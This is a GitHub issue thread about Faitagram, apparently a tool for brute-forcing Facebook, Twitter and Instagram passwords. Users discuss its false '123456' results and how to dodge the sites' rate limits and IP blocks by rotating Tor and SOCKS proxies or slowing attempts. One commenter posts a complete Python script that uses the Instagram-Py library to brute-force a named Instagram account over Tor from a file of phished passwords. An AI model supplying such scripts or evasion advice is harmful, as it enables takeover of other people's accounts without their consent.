### ISSUE TITLE
Always same password

### ISSUE THREAD

**Issue by hshehab** [Juniorn1003/Faitagram#13]
Hello, 

I tried everthing for that to work, fixed tor.service issue then all my accounts show the same password: 
123456 which is wrong for sure. can you help please

**Comment by Juniorn1003** [comment]
That means you tried it before, I am currently working on the proxy part, the social media security checks that the request is way too heavily requested from one IP, so it blocks it. The script works by deciding whether the “password wrong” is in the web, but if it detects bruting, it automatically changes the page. So the script thinks it is the right password. I am currently trying to fix this problem, I won’t close this issue.

**Comment by hshehab** [comment]
Thanks for your response juniorn, yeah guess it's exactly what you're saying coz facebook sent me an email in regards of security to log in again in case i wasn't trying to log. They detected something.

anyways thanks again for your response and looking forward for your solution.

**Comment by smokeabird** [comment]
Hello Juniorn1003,
You're right ! The same problem happens with the two others services. But, the error happens after 20 passwords, after that twitter and instagram securities block the bruteforcing, telling us to retry connection one hour later.

**Comment by Juniorn1003** [comment]
@smokeabird You are right, but the securities will not block if we change the IP and then request, because they are made to just detect it by if it is coming from the same IP.

**Comment by PlaguedByWeirdness** [comment]
Hmmm now I get the Errno 111 Connection refused after 2 passwords, like before

**Comment by Juniorn1003** [comment]
@PlaguedByWeirdness I know, it is because the socks proxy doesn't work in selenium. And that is what I have to figure out.

**Comment by PlaguedByWeirdness** [comment]
Ohh so that's the error, well good luck in figuring it out mate!

**Comment by PlaguedByWeirdness** [comment]
How is it going? If you want I could get into that too, but I would probably need some time to actually see what is done and how in order to be able to help.

**Comment by Juniorn1003** [comment]
@PlaguedByWeirdness  Ok, so I added a socks5 proxy, you know that, but the problem is it is not compatible with selenium. A way I found is close the selenium session, and doing it again, after the IP is changed by socks. but that will take way too long time to bruteforce, so I am googling what proxy is compatible with selenium, with out any errors.

**Comment by PlaguedByWeirdness** [comment]
@Juniorn1003 Alright, keep me updated on your findings if you can

**Comment by jlgager24** [comment]
I'm very interested in seeing this work too. I'm a java developer so if I can be of any help please let me know. Hope you figure it out!

**Comment by Juniorn1003** [comment]
vanguard71 suggested to delete the username checking part, is that OK with you guys?

**Comment by PlaguedByWeirdness** [comment]
@Juniorn1003 Sure, why not

**Comment by Ethical-H4CK3R** [comment]
replace your assertions with if statements, and check for data that will only occur in the HTML when an account is authenticated. You bounce your IP to keep yourself hidden, not to go around locked accounts. Sites like these know that a hacker will bounce their IP and continue to brute force if they only lock the hacker's IP; so, they lock the account and the IP. The only way to get around this is to reduce your attempt rate.

**Comment by Juniorn1003** [comment]
@Ethical-H4CK3R  I NEVER expected you here! Wow, I actually made this because your script didn't work

**Comment by Ethical-H4CK3R** [comment]
I guess you don't want my help.

**Comment by AlzMa** [comment]
I think he wants, and admires your work.. @Ethical-H4CK3R

**Comment by maumau35** [comment]
https://github.com/SeleniumHQ/selenium/issues/2963 Maybe this? Very new to programming, so sorry if this is not where you are looking for.

**Comment by Juniorn1003** [comment]
@maumau35  Nah, that is Java and this is python, the problem in #2963 is the starting proxy problem, and this is a problem about the proxy during selenium is running.

**Comment by maumau35** [comment]
Thanks, for clarifying. Maybe try stackoverflow or in selenium issues?

**Comment by Juniorn1003** [comment]
@maumau35  Of coures I asked. But apparently no one replies, it has about a 100 views.

**Comment by antony-jr** [comment]
@Juniorn1003 There is a very easy solution my friend but only for instagram but can be applicable to everything if you know what you are doing , that is. Here is the new Instagram-Py -> https://github.com/antony-jr/Instagram-Py ( PLEASE SEE I'M THE ORIGINAL AUTHOR ).

With the new Instagram-Py you can now use **tor browser** without **selenum**. Also as of **Instagram-Py v1.3.1** , Instagram-Py Supports to be used as a module in your own python script.

Here is the code to brute force instagram with **Instagram-Py** as a module. ( Check the repo for more information -> https://github.com/antony-jr/Instagram-Py ).

Please install **instagram-py** with **pip** , refer the repo for more information on installation.
or see this video by a random youtube guy -> https://www.youtube.com/watch?v=KZEcFn3Z5L0

``` 
#!/usr/bin/env python3
# Only supports python3
from InstagramPy.InstagramPyCLI import InstagramPyCLI
from InstagramPy.InstagramPySession import InstagramPySession
from InstagramPy.InstagramPyInstance import InstagramPyInstance
from InstagramPy.InstagramPyConfigurationCreator import InstagramPyConfigurationCreator
from datetime import datetime
import sys

username = "_antony.jr" # Target username
password = "/home/antonyjr/Developer/.exploits/facebook-phished.txt" # Passwords
appInfo = { # Manditory. Will be fixed later.
   "version"     : "0.0.1",
   "name"        : "Faitagram",
   "description" : "Faitagram Instagram Module",
   "author"      : "YourName",
   "company"     : "YourCompany",
   "year"        : "2017",
   "example"     : ""
}
# Manditory for error reporting.
cli = InstagramPyCLI(username = username ,appinfo = appInfo,
                     started = datetime.now() , verbose_level = 3)
DefaultConfig = True # false to ask the user.
if DefaultConfig:
 # Create Configuration without user interaction.
 InstagramPyConfigurationCreator("faitagram-insta-config.json").create()
else:
 # Create Configuration with user ( For custom tor servers ).
 InstagramPyConfigurationCreator("faitagram-insta-config.json").easy_create()

session = InstagramPySession(username , password ,
                             "faitagram-insta-config.json" ,
                             # Will be created automatically -> save dir.
                             "faitagram-save-path-dir/" , cli)
session.ReadSaveFile(True) # True to countinue attack if found save file.
# cli = cli will use the default output system by instagram-py
instagrampy = InstagramPyInstance(cli = None ,session = session)
while not instagrampy.PasswordFound():
       print('Trying... '+session.CurrentPassword())
       instagrampy.TryPassword()
if instagrampy.PasswordFound():
       print('Password Found: '+session.CurrentPassword())
sys.exit(0)
```

**Please use the tool if you like to , it uses pure request and not selenum. Only Requires Tor Server** , Check it out here: https://github.com/antony-jr/Instagram-Py

**Comment by antony-jr** [comment]
its no advertisement , its a actuall solution!

**Comment by antony-jr** [comment]
@Juniorn1003 Just Curious why are you using **Selenium** ? Why not use **Pure Requests** ?

**Comment by glerinsonum** [comment]
@Juniorn1003 Hello. Brother of Good. With what type version program of python should need to demonstrate.

**Comment by ROOTH4CK3R** [comment]
Same here.
I tried the script for all facebook, twitter and instagram but the same password "123456" keep showing up and it's not correct.
What should I do?

**Comment by Drudude** [comment]
Really excited to know whether its working or not. Anyway keep pn researching bruv

**Comment by tosettil-polimi** [comment]
Hi, today the same problem remained, does anyone know if there is a solution?

**Comment by NateDev100** [comment]
Same problem after 1 password attempt, trying Instagram.
